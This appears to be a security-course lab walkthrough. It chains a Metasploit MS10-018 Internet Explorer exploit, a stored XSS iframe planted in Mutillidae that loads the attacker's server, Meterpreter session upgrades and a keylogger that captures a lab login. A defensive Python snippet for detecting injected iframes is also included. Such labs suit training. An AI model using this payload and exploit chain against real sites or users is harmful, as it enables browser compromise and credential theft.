OWASP Top 10 Web Hacking Final Lab 16 - Persistent Covert Cross Site Scripting Injection with Metasploit #3

Written By Akademy on Thursday, November 21, 2013 | 9:31 PM

{ Persistent Covert Cross Site Scripting Injection with Metasploit #3 }

    OWASP Top 10 Web Hacking Final Lab 16

Start msfconsole
  1. Start msfconsole (On BackTrack5R1)
    • Instructions:
      1. msfconsole
    • Note(FYI):
      1. The msfconsole is the Metasploit Framework Console.
  2. Search for MS10-018
    • Instructions:
      1. search ms10_018
      2. use exploit/windows/browser/ms10_018_ie_behaviors
    • Note(FYI):
      1. This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file.
  3. Set Payload
    • Instructions:
      1. set PAYLOAD windows/shell/bind_tcp
      2. show options
  4. Set Required Variables
    • Note(FYI):
      • Replace 192.168.1.112 with your BackTrack IP Address obtained from (Section 6, Step 2).
    • Instructions:
      1. set SRVHOST 192.168.1.112
      2. set URIPATH ms10_018.html
        • Setting the URIPATH is optional, and the name ms10_018.html is arbitrary; if you leave it unset, Metasploit generates a random path.
      3. show options
  5. Start Exploit Server
    • Instructions:
      1. exploit
      2. Highlight the Link
      3. Right Click and Copy the Weblink (See Picture)
    • Note(FYI):
      • The aurora exploit is all set up.
      • The server is started and the daemon is listening.
Section 9. Open Mutillidae
  1. Open Firefox (On BackTrack5R1)
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      1. Replace 192.168.1.111 in the URL http://192.168.1.111/mutillidae with the IP Address of your Mutillidae machine obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
  3. Reset Database
    • Instructions:
      1. Click the Reset DB Link
    • Notes (FYI):
      • This link will remove the XSS Injection from the database.
  4. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button
Section 10. Persistent Covert Cross Site Scripting (XSS)
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  2. Inspect Element
    • Instructions:
      1. Right Click in the Comment Box
      2. Click Inspect Element
    • Note(FYI):
      1. This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
  3. Change Text Area Column Length
    • Instructions:
      1. Change 65 to 95
      2. Click Close Button (See Picture)
  4. Covert Metasploit Cross Site Script (XSS) Injection
    • Note(FYI):
      1. Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
      2. Every time a user views all the blog records, the malicious Metasploit link will be loaded in the user's browser.
    • Instructions:
      1. Place the below text in the comment box.
        • <iframe src="http://192.168.1.112:8080/ms10_018.html"></iframe>
      2. Click the Save Blog Entry button
  5. View Metasploit Covert Cross Site Script (XSS) Results
    • Note(FYI):
      1. Notice that it says URL Not Found.
      2. At first glance it looks like we screwed up. (But did we?)
  6. View Metasploit Results
    • Instructions:
      1. Press Enter Once
      2. sessions -l
        • "-l" as in Larry.
    • Notes (FYI):
      1. The reason the URL was not found in the previous step is that the exploit is geared for IE6 and IE7 on Windows NT, 2000, XP, 2003 or Vista, not for the Firefox browser on BackTrack.
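Added example (not part of this lab or of Mutillidae's own code): a small Python check a defender can run over stored blog entries to flag exactly the kind of injected iframe used in this section, next to the output encoding that stops a stored entry from being rendered as markup. The sample rows and the trusted-host list are constructed assumptions.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample blog entries modelled on the Mutillidae "Add to your blog"
# form; the second row is the iframe injected in Section 10, Step 4.
SAMPLE_ENTRIES = [
    ("samurai", "Remember to reset the DB before each run."),
    ("anonymous", '<iframe src="http://192.168.1.112:8080/ms10_018.html"></iframe>'),
    ("samurai", 'See <a href="http://192.168.1.111/mutillidae/">the app</a> page.'),
    ("anonymous", '<img src=x onerror="alert(1)">'),
]

# Hosts the application legitimately embeds content from (assumed for the example).
TRUSTED_HOSTS = {"192.168.1.111"}

TAG_RE = re.compile(r"<\s*(iframe|script|object|embed)\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)


def find_injected_markup(entries):
    """Return (author, reason) for each entry that embeds content-loading tags
    from an untrusted host or carries an inline event handler."""
    findings = []
    for author, body in entries:
        for tag in TAG_RE.finditer(body):
            src = SRC_RE.search(tag.group(0))
            host = urlparse(src.group(1)).hostname if src else None
            if host is None or host not in TRUSTED_HOSTS:
                findings.append((author, f"{tag.group(1).lower()} loading from {host or 'inline'}"))
        if HANDLER_RE.search(body):
            findings.append((author, "inline event handler"))
    return findings


def render_entry(body):
    """Output-encode a stored entry so injected tags display as text instead of executing."""
    return html.escape(body, quote=True)
```

Running find_injected_markup over the sample rows reports the off-origin iframe and the onerror handler; render_entry shows why encoding at output time, rather than trusting stored data, is the fix for this class of stored XSS.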

Section 11. Login to Mutillidae From Vulnerable Machine
  1. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Open the Mutillidae Application
    • Notes (FYI):
      1. Replace 192.168.1.111 in the URL http://192.168.1.111/mutillidae with the IP Address of your Mutillidae machine obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
      2. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  3. Show All Blog Entries
    • Instructions:
      1. Select Show All from drop down menu
      2. Click the View Blog Entries Button
  4. View the Metasploit Aurora Effect
    • Note(FYI):
      1. At first glance the status bar will appear to be loading, then it will just hang.
      2. In a few seconds, Internet Explo[d]er 6 will become unresponsive.
      3. Continue to Next Step.

Section 12. Activate Metasploit KeyStrokeLogger
  1. View Metasploit Connection (On BackTrack)
    • Instructions:
      1. Press Enter Once
      2. sessions -l
        • "-l" as in Larry
    • Note(FYI):
      1. Notice we now have a connection from BackTrack(192.168.1.112) to Damn Vulnerable WXP (192.168.1.107).
  2. Create New Meterpreter Session
    • Instructions:
      1. setg LHOST 192.168.1.112
        • This allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell.
      2. sessions -u 1
        • "1" as in the number 1.
    • Note(FYI):
      1. Replace 192.168.1.112 with your BackTrack IP Address obtained from (Section 6, Step 2)
      2. The console starts a Meterpreter payload handler and stages Meterpreter through the existing shell session.
      3. Continue to Next Step.
  3. Interact with the Meterpreter Session
    • Instructions:
      1. Press <Enter> to get a prompt
      2. sessions -l
        • "-l" as in larry.
        • Notice there are now two sessions: (1) Shell and (2) Meterpreter.
      3. sessions -i 2
        • "-i" means to interact
  4. Activate the KeyLogRecorder
    • Instructions:
      1. run keylogrecorder
    • Note(FYI):
      • Notice the message that says the keystrokes are being saved to a file.
      • Make a note of the file name; you will read it in Section 14.

Section 13. Test Metasploit KeyLogRecorder
  1. Kill Hung Mutillidae Webpage (On Damn Vulnerable WXP-SP2)
    • Note(FYI):
      1. If your Internet Explorer session DOES NOT exist, then skip this step.
    • Instructions:
      1. tasklist /V | findstr "mutillidae"
        • Obtain the PID associated with the Mutillidae process.
        • In my case it is 3940.
      2. taskkill /F /PID 3940
        • This forcibly kills process ID 3940.
        • In your case, the PID will be different.
  2. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  3. Open the Mutillidae Application
    • Notes (FYI):
      1. Replace 192.168.1.111 in the URL http://192.168.1.111/mutillidae with the IP Address of your Mutillidae machine obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
        • Type each character to record each keystroke.
      2. Click Login/Register
  4. Login
    • Instructions:
      1. Name: samurai
      2. Password: samurai
      3. Click the Login Button
    • Notes(FYI):
      1. We are logging on to Mutillidae to simulate a user logging on to a real application.
      2. The goal is to capture keystrokes.

Section 14. View Metasploit KeyLogRecorder Log
  1. Stop the keylogrecorder (On BackTrack)
    • Instructions:
      1. Copy Key Log Recorder File (See Picture)
      2. Press <Ctrl> and "c" to stop the keylogrecorder
  2. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon
  3. View keylogrecorder File
    • Instructions:
      1. cat /root/.msf4/logs/scripts/keylogrecorder/*.txt
      2. Search for the mutillidae website
      3. Search for the username (samurai) and password (samurai)
    • Note(FYI):
      1. It's not the greatest logger, but it will do the job.
Section 15. Proof of Lab
  1. Proof of Lab: record your entire lab session and a text note bearing your name.